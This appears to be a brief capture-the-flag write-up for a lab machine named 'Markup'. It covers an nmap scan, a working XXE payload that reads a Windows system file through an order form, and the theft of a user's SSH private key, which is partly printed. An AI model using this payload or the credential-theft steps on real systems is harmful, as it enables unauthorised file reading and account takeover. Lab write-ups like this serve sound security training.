Markup

Personal Rating: Very Easy

Enumeration

A first nmap scan revealed a webserver on the Windows machine:

sudo nmap -sC -sV <IP>

XXE Exploit

Visiting that Server, it was to be discovered that XML formatted user input was sent to the server. I tried a simple test XXE and it worked directly:

<?xml version = "1.0"?> 

<!DOCTYPE soos [ <!ENTITY xee SYSTEM "C:/Windows/win.ini"> ]> 

    <order> 
        <quantity>1</quantity>
        <item>&xee;</item>
        <address></address>
    </order>

The loaded external entity had to be in the "item" field and the path delimiter had to be a '/' despite the machine running Windows.

Persistence

Using the XXE I could obtain the private ssh key of the user and ssh onto the machine.

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
<SNIP>
m3MVFR4sN7a1cAAAANZGFuaWVsQEVudGl0eQECAwQFBg==
-----END OPENSSH PRIVATE KEY-----

Last updated